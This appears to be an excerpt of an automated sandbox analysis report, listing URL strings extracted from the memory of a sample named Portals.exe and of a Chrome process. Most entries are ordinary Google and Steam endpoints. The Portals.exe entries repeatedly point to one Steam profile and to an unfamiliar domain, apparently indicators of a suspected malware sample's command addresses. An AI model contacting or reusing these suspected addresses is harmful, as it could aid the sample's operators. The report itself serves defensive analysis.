        Source: chrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
        Source: chrome.exe, 0000000D.00000003.1872712918.0000322C01520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
        Source: chrome.exe, 0000000D.00000002.1919623306.0000322C0048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1919170961.0000322C0032C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
        Source: chrome.exe, 0000000D.00000002.1925829622.0000322C010B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1841148367.0000322C01072000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920607852.0000322C00720000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925308799.0000322C01072000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1924180759.0000322C00F3C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931542965.0000322C017C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1927274224.0000322C011D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1926067277.0000322C010EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1924180759.0000322C00F3C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.1931542965.0000322C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_defaultfault
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
        Source: chrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
        Source: chrome.exe, 0000000D.00000002.1922188223.0000322C00A8C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931402550.0000322C01744000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
        Source: chrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A52000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922796680.0000322C00CB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
        Source: chrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A52000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922796680.0000322C00CB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
        Source: chrome.exe, 0000000D.00000003.1821233579.00003228004B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
        Source: chrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A52000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922796680.0000322C00CB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
        Source: chrome.exe, 0000000D.00000002.1922617677.0000322C00C18000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmp, chrome.exe, 0000000D.00000003.1873296558.0000322C011B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
        Source: chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
        Source: chrome.exe, 0000000D.00000002.1925308799.0000322C01072000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
        Source: chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
        Source: chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930343211.0000322C014C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930965123.0000322C0156C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930343211.0000322C014C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
        Source: chrome.exe, 0000000D.00000002.1924299882.0000322C00FC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930343211.0000322C014C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930965123.0000322C0156C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930343211.0000322C014C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922646872.0000322C00C34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930343211.0000322C014C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930965123.0000322C0156C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
        Source: chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1918352273.0000322C00118000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808228&target=OPTIMIZATION_TARGET_GEO
        Source: chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808249&target=OPTIMIZATION_TARGET_NOT
        Source: chrome.exe, 0000000D.00000002.1931082495.0000322C01594000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739894676&target=OPTIMIZATION_TARGET_CLI
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930965123.0000322C0156C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
        Source: chrome.exe, 0000000D.00000002.1931082495.0000322C01594000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
        Source: chrome.exe, 0000000D.00000002.1928100113.0000322C0131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930343211.0000322C014C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873373476.0000322C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930965123.0000322C0156C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925669692.0000322C010AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
        Source: chrome.exe, 0000000D.00000002.1931015268.0000322C01588000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930992165.0000322C0157C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
        Source: chrome.exe, 0000000D.00000003.1872712918.0000322C01520000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930507532.0000322C01500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://passwords.google.comSaved
        Source: chrome.exe, 0000000D.00000002.1921596827.0000322C0093C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
        Source: chrome.exe, 0000000D.00000002.1922617677.0000322C00C18000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmp, chrome.exe, 0000000D.00000003.1873296558.0000322C011B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
        Source: chrome.exe, 0000000D.00000002.1920833658.0000322C007D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
        Source: chrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
        Source: chrome.exe, 0000000D.00000002.1919444558.0000322C003E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
        Source: chrome.exe, 0000000D.00000002.1918160591.0000322C000B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1923169099.0000322C00DEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
        Source: chrome.exe, 0000000D.00000002.1933012783.0000322C01CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
        Source: chrome.exe, 0000000D.00000002.1922864243.0000322C00D0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922454214.0000322C00BB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931377313.0000322C0172C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
        Source: chrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=https%3A%2F%2Fsteamcommunity.com%2Fprofiles%2F7656119982
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199829660832
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/ok
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832/awards/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832/badges
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832/badges/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832/badges/48
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832/inventory/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832=s
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832B
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832C:
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832U
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832alifornia1
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832an
        Source: Portals.exe, 00000001.00000002.2197435961.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832ir7amMozilla/5.0
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.fastly.steamstatic.com/public/images/loyalty/reactions/animated/16.png?v=5
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.fastly.steamstatic.com/public/images/loyalty/reactions/still/16.png?v=5
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://support.google.com/chrome/answer/96817
        Source: chrome.exe, 0000000D.00000002.1920543191.0000322C006A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://support.google.com/chromebook?p=app_intent
        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
